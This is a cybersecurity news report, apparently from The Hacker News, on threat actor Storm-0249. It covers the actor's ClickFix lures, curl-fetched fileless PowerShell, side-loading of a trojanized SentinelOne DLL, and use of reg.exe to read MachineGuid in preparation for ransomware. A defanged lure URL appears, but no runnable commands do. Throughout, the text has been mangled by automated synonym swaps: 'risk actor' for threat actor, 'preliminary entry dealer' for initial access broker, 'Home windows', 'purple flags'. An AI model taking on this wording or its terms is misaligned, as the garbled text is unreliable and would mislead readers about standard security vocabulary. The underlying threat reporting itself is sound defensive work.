Dec 09, 2025Ravie LakshmananRansomware / Endpoint Safety
The risk actor generally known as Storm-0249 is probably going shifting from its position as an preliminary entry dealer to undertake a mix of extra superior techniques like area spoofing, DLL side-loading, and fileless PowerShell execution to facilitate ransomware assaults.
“These strategies permit them to bypass defenses, infiltrate networks, keep persistence, and function undetected, elevating severe issues for safety groups,” ReliaQuest mentioned in a report shared with The Hacker Information.
Storm-0249 is the moniker assigned by Microsoft to an preliminary entry dealer that has offered footholds into organizations to different cybercrime teams, together with ransomware and extortion actors like Storm-0501. It was first highlighted by the tech large in September 2024.
Then, earlier this yr, Microsoft additionally revealed particulars of a phishing marketing campaign mounted by the risk actor that used tax-related themes to focus on customers within the U.S. forward of the tax submitting season and infect them with Latrodectus and the BruteRatel C4 (BRc4) post-exploitation framework.
The top objective of those infections is to acquire persistent entry to varied enterprise networks and monetize them by promoting them to ransomware gangs, offering them with a prepared provide of targets, and accelerating the tempo of such assaults.
The newest findings from ReliaQuest reveal a tactical shift, the place Storm-0249 has resorted to utilizing the notorious ClickFix social engineering tactic to trick potential targets into operating malicious instructions by way of the Home windows Run dialog underneath the pretext of resolving a technical subject.
On this case, the command copied and executed leverages the respectable “curl.exe” to fetch a PowerShell script from a URL that mimics a Microsoft area to provide victims a false sense of belief (“sgcipl[.]com/us.microsoft.com/bdo/”) and execute it in a fileless method by way of PowerShell.
This, in flip, leads to the execution of a malicious MSI bundle with SYSTEM privileges, which drops a trojanized DLL related to SentinelOne’s endpoint safety resolution (“SentinelAgentCore.dll”) into the person’s AppData folder together with the respectable “SentinelAgentWorker.exe” executable.
In doing so, the concept is to sideload the rogue DLL when the “SentinelAgentWorker.exe” course of is launched, thereby permitting the exercise to remain undetected. The DLL then establishes encrypted communication with a command-and-control (C2) server.
Storm-0249 has additionally been noticed making use of respectable Home windows administrative utilities like reg.exe and findstr.exe to extract distinctive system identifiers like MachineGuid to put the groundwork for follow-on ransomware assaults. The usage of living-off-the-land (LotL) techniques, coupled with the truth that these instructions are run underneath the trusted “SentinelAgentWorker.exe” course of, means the exercise is unlikely to lift any purple flags.
The findings point out a departure from mass phishing campaigns to precision assaults that weaponize the belief related to signed processes for added stealth.
“This is not simply generic reconnaissance – it is preparation for ransomware associates,” ReliaQuest mentioned. “Ransomware teams like LockBit and ALPHV use MachineGuid to bind encryption keys to particular person sufferer techniques.”
“By tying encryption keys to MachineGuid, attackers be certain that even when defenders seize the ransomware binary or try and reverse-engineer the encryption algorithm, they can not decrypt information with out the attacker-controlled key.”
